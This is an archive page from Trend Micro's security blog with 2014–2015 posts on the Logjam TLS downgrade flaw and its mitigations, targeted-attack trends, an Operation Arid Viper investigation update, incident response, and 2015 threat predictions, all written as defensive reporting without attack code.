Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    May 2015
    S M T W T F S
    « Apr    
  • Email Subscription

  • About Us

    Author Archive - Trend Micro

    6:03 am (UTC-7)   |    by

    logjam 1Another flaw has been found in the basic encryption algorithms that secure the Internet. This flaw, named the Logjam attack by its discoverers (researchers from various universities and companies), allows an attacker that can carry out man-in-the-middle attacks to weaken the encryption used in secure connections (such as HTTPS, SSH, and VPNs). In theory, this means that an attacker (with sufficient resources) can break the encryption and read the “secure” traffic.

    In some ways, this attack is similar to the recent FREAK attack. Both attacks were made possible by support for “export-grade” encryption standards. Until the 1990s, cryptography was considered a “munition” in the United States and limits were placed on the strength of cryptography that products “exported” for use outside of the US could support. Unfortunately, what was “acceptable” cryptography then can now be cracked with sufficient computation resources.

    The vulnerability lies in how the Diffie-Hellman key exchange is carried out. Logjam can be used to lower the strength of the accepted algorithms to those that use 512-bit prime numbers (as used in “export-grade” encryption). Similar research (also carried out by the Logjam researchers) proved that other vulnerabilities are present in systems that use 768- and 1024-bit primes. Nation-states may have the resources needed to exploit these flaws; this can allow an attacker to decrypt secure traffic that has been passively collected.

    Who is at risk?

    Theoretically, any protocol that uses the Diffie-Hellman key exchange is at risk from this attack. However, note that this attack requires two factors on the part of the attacker: the ability to intercept traffic between the secure server and the client, as well as significant computation resources.

    The researchers estimate that up to 8.4% of all sites in the top one million domains are vulnerable. Similar percentages of POP3S and IMAPS (secure email) servers are at risk.

    What should I do now?

    For end users, there’s really only one thing to do: update your browsers. All the major browser vendors (Google, Mozilla, Microsoft, and Apple) are preparing updates for their various products, and should release an update soon. You can also check if your browser is vulnerable by visiting this site.

    For software developers, the fix is also relatively simple. Check that any encryption libraries that are used or bundled with your application are all up to date. In addition, the use of larger prime numbers for key exchange can be specified as well.

    The main task falls on IT administrators with servers that use any of the at-risk services and protocols. In these cases, the following needs to be performed:

    • Disable support for all export cipher suites, to ensure they cannot be used.
    • Increase the number of bits used by the prime numbers in the Diffie-Hellman key exchange to 2048 bits; this ensures that exceptional computational powers would be needed to break any encryption based on this process.

    Trend Micro solutions

    We have released the following rules for  Trend Micro Deep Security and Vulnerability Protection users that protect against this threat:

    • 1006561 – Identified Usage Of TLS/SSL EXPORT Cipher Suite In Response
    • 1006562 – Identified Usage Of TLS/SSL EXPORT Cipher Suite In Request

    Post updated on May 20, 2015 7:45 PM PDT to add Trend Micro solutions. 

    Post updated on May 21, 2015 1:40 PM PDT to refine Trend Micro solutions.

    Posted in Vulnerabilities |

    7:13 pm (UTC-7)   |    by

    2014 was a year in which we saw further refinements in targeted attack methodologies. As more organizations upgraded to newer versions of Windows, we saw the increased use of 64-bit malware in several campaigns. Examples of 64-bit malware include HAVEX, a remote access Trojan (RAT) used in a campaign that targeted industrial control systems (ICS), and WIPALL, the notorious malware behind the Sony Pictures hack.

    The move to newer versions of Windows also led to the abuse of legitimate tools/features in attacks. An example is Windows PowerShell®, a feature in versions for Windows 7 and higher that allows system administrators to access other features without the use of graphical user interfaces (GUIs). PowerShell commands were abused to download malicious files and bypass execution policies, which allowed the downloaded files to be executed.

    A document exploit template, detected as TROJ_MDROP.TRX, was found in several targeted attacks. This exploit was most likely sold and distributed underground because of its use in several campaigns. Threat actors could simply modify the exploit template to fit their intended payload.

    Based on our data, .RTF and .DOC files were the two most frequently used email attachments, most likely because Microsoft Word® is used in any organization.

    Figure 1. Most frequently used email attachment file types in targeted attacks in 2014

    Old and New Vulnerabilities in Attacks

    Several zero-day exploits were used in targeted attacks in 2014. For example, two Taidoor-related zero-day exploit attacks targeting CVE-2014-1761 hit government agencies and an educational institution in Taiwan, with a window of exposure of 15 days. Exploiting new vulnerabilities has been proven to be more effective because security vendors have yet to create patches. Zero-day exploits can catch vendors and victims alike unawares.

    The use of new vulnerabilities doesn’t mean that threat actors have done away with older ones. In fact, targeting old vulnerabilities also proved reliable because attackers can just use tried-and-tested exploits that may be easily bought.

    Despite being patched via MS12-027, CVE-2012-0158 remained a favored vulnerability for attackers. Additionally, it was the most exploited vulnerability used by targeted attacks in the first half of 2014. Two notable campaigns, PLEAD and Operation Pawn Storm, abused this vulnerability to infiltrate target networks.

    A Global Problem

    Government agencies remained the most favored attack targets in 2014. In the second half of the year, we saw a spike in the number of attacks that targeted hardware/software companies, consumer electronics manufacturers, and health care providers.

    We also determined the global distribution of targets accessing C&C servers. As shown in the heat map below, the United States, Russia, and China were no longer the only favored targets. Other targets included Taiwan, South Korea, France, and Germany.

    Figure 2. Top countries that communicated with targeted attack C&C servers in 2014 (click the image to enlarge)

    Keeping Up with Threats

    Given the increased volume of targeted attacks, ease of mounting them, and difficulty to protect against them, network defenders must be able to adapt a shift in mindset from prevention to detection. This means accepting that targeted attacks will eventually hit their networks; without an assurance that a suite of blacklisting technologies will be able to keep determined threat actors at bay.

    Building threat intelligence is crucial in the fight against targeted attacks. Knowledge of the tools, tactics, and procedures that threat actors use based on external reports and internal historical and current monitoring can help create a strong database of indicators of compromise (IoCs) that can serve as basis for action. But organizations shouldn’t limit themselves to simply knowledge of the attacks. Establishing and empowering incident response teams and training employees, partners, and vendors on social engineering and computer security can also help mitigate the risks involved with targeted attacks.

    For full details on our findings, you may read our Targeted Attack Trends: 2014 Annual Report.


    operation-arid-viper-advtravel_thumbLast week, we released a research paper titled “Operation Arid Viper: Bypassing the Iron Dome” where we detailed two related campaigns. To recall, here are our key findings related to the two campaigns:

    • Palestinian threat actors have staged a targeted attack, Operation Arid Viper, to exfiltrate data from high-profile targets in the Israeli government and have been doing so since mid-2013. The attacks are still on-going, coinciding with the political tension between Israel and Palestinians.
    • Investigation of the Germany-hosted server used in Arid Viper revealed a group of Egyptian hackers (Advtravel) that have less technical knowhow and are attacking other Egyptians in less purposeful attacks.
    • Both groups have strong Arab ties, and the same server and site registration details suggest the existence of a supra-organization, a forum or an influential sponsor could be providing various hacking groups with the means to pursue their ends.

    Since the report was released, we have continued our investigation and have a number of updates:

    • None of the C&C domains have moved to other hosting providers or had other major changes since the publishing of our report. Although we have not seen newly compiled samples being spread – we have seen 2 recent attempted infections with existing binaries from Arid Viper on the 15th and 19th of February against a target in Israel and Kuwait respectively. For reference, our paper went public on the 16th.
    • Interestingly, a number of the people linked to the C&C servers in the paper have made changes to their public profiles since the paper went live. To date none of these individuals have contacted us to dispute the details we outlined in the paper:
      • The Facebook account we mentioned in the paper for Fathy Mostafa is now no longer active.
      • Quite a number of the accounts we related to Ebrahim Said El-Sharawy (aka Dev_Hima) have been modified or removed.  Upon inspection today, his accounts on Blogspot, Facebook, Twitter, and are no longer active. His main webpage ( which had hosted two questionable tools we outlined in the report has been changed to remove all of that content and has been replaced with the words “Closed by DevHima”:

    Screen Shot 2015-02-24 at 21.18.17

    •  Some of his other accounts such as his LinkedIn, SoundHound, and YouTube (which is hard to remove without deleting your personal Gmail account) are still live at the time of writing.
    • After further investigation, we now believe that the email used to register the C&C pstcmedia[dot]com ,, actually belongs to the Web hosting provider that registered this domain on a client’s behalf – and is not an individual involved in the campaign itself. We have updated our paper to remove reference to Mr. Samraa with the exception that the email address was used to register this site.

    Trend Micro will continue to research more on these campaigns over the coming months and post updates as we find them.

    Posted in Targeted Attacks |

    For many organizations today, the question is no longer if they will fall victim to a targeted attack, but when. In such an event, how an organization responds will determine whether it becomes a serious event or if it stays a mere annoyance.

    This requires something of a change of mindset for information security professionals. Previous techniques and many best practices are under the premise that an attacker can be kept out.

    However, that’s no longer the case today. The malware used in targeted attacks is frequently not detected (because it’s been custom-made for specific organizations). A well-crafted social engineering attack can look like a normal business email or engaging click bait.

    In short, an attacker with sufficient resources will be able to find their way inside their target, regardless of what the defender does. The defender can raise the price of getting in, but not prevent it entirely.

    The SANS Institute provides some guidelines to organizations on how they should react to incidents. Broadly speaking, however, the response can be divided into four steps:

    Read the rest of this entry »

    Posted in Targeted Attacks | Comments Off on Four Steps To An Effective Targeted Attack Response

    2014 brought with it many significant additions to the technology landscape. These put new capabilities into the hands of users and companies that allowed them to do things that they would not have thought possible before. However, these same changes also aid threat actors: threats can now come from unexpected vectors, and augment the existing capabilities that attackers already possess.

    What are the key developments that will shape the threat landscape of tomorrow, and how do we foresee its evolution? These are the trends that we think will shape 2015:

    More cybercriminals will turn to darknets and exclusive-access forums to share and sell crimeware.

    We’ve seen cybercriminals leveraging Deep Web and other darknet services as well as untraceable peer-to-peer networks (e.g. Tor, I2P, Freenet) for selling and exchanging tools and services. Takedowns and collaborative efforts beween researchers and law enforcement agencies have disrupted cybercrime gangs, giving them more reasons to go further underground. Security firms together with law enforcement agencies need to extend their reach by providing threat intelligence and having one definition of cybercrime to help law enforcers regardless of jurisdictions, to catch cybercriminals and attackers.

    Increased cyber activity will translate to better, bigger, and more successful hacking tools and attempts.

    Cybercriminals will go after bigger targets rather than home users as this can generate more profits for them. We will see more data breach incidents with banks, financial institutions, and customer data holders remaining to be attractive targets. As such, organizations and individuals need to assume compromise; enterprises need to constantly monitor their network for any threats while individual users must always change their passwords to prevent data theft.

    Exploit kits will target Android, as mobile vulnerabilities play a bigger role in device infection.

    Aside from the growth of Android threats, we will see more vulnerabilities found in mobile devices, apps, and platforms in the coming year. Cybercriminals will target data stored in these mobile devices. In addition, attackers may employ tools similar to Blackhole Exploit Kit (BHEK), leveraging Android OS fragmentation. Traditional threats like ransomware will plague the mobile landscape as well.

    Targeted attacks will become as prevalent as cybercrime.

    The success of high-profile targeted attack campaigns has highlighted the fact that cyber attacks are useful means of gathering intelligence. With this, we will see targeted attacks from other countries, not just countries that are commonly said to be the source of these attacks. We will observe more diversity in terms of targets and attack origins as more threat actors with differing agendas are seen. Although the motivations of threat actors may vary, they will continue to steal information such as top-secret government, data, financial information, intellectual property, industry blueprints, among others. Social media will become a new entry point for targeted attacks.

    New mobile payment methods will introduce new threats.

    The introduction of Apple Pay with the iPhone 6 and 6 Plus may kickstart the adoption of mobile payment systems by many consumers. Apple Pay is not alone in the market – other payment systems have or will be introduced by other companies and trade associations. Not all of these payment systems have been thoroughly tested to withstand real-world threats, and we may see attacks targeting mobile commerce in 2015.

    We will see more attempts to exploit vulnerabilities in open source apps.

    In 2014, we saw several vulnerabilities in open-source projects such as Shellshock and Heartbleed. These vulnerabilities were undetected for years and were only brought into light recently. Due to the massive impact of these vulnerabilities, cybercriminals and attackers may decide to investigate the existing code and see if other dormant vulnerabilities are present.

    They will also set their eyes on other less-known platforms, protocols, and software. Furthermore, they will look for vulnerabilities found in open source platforms and apps (for example Open SSL v3) as well as OS kernels.

    Technological diversity will save IoE/IoT devices from mass attacks but the same won’t be true for the data they process.

    A wide variety of devices will make up the Internet of Things/Internet of Everything – from fitness devices to smart home appliances, the smartification of everything will continue apace. This variety will also provide this field some measure of safety – no single attack will cover all of these devices. However, the data gathered by these devices may well be at risk if companies providing various IoE services are breached.

    More severe online banking and other financially motivated threats will surface.

    Weak security practices like not using two-factor authentication and chip-and-pin technology continue to persist in the banking sector. These practices will cause financially motivated threats to grow in scale throughout the coming year.

    Apart from credentials, cybercriminals will steal user identities. Mobile device users will also be affected by these threats as cybercriminals will launch mobile phishing attacks, use of fake aps and domain name system (DNS) changers. We will see stealthier mobile threats that use packers similar to computer software.

    More details about these predictions can be found at Trend Micro Security Predictions for 2015 and Beyond.

    Posted in Bad Sites, Internet of Things, Mobile, Targeted Attacks, Vulnerabilities | Comments Off on 2015 Predictions: The Invisible Becomes Visible


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice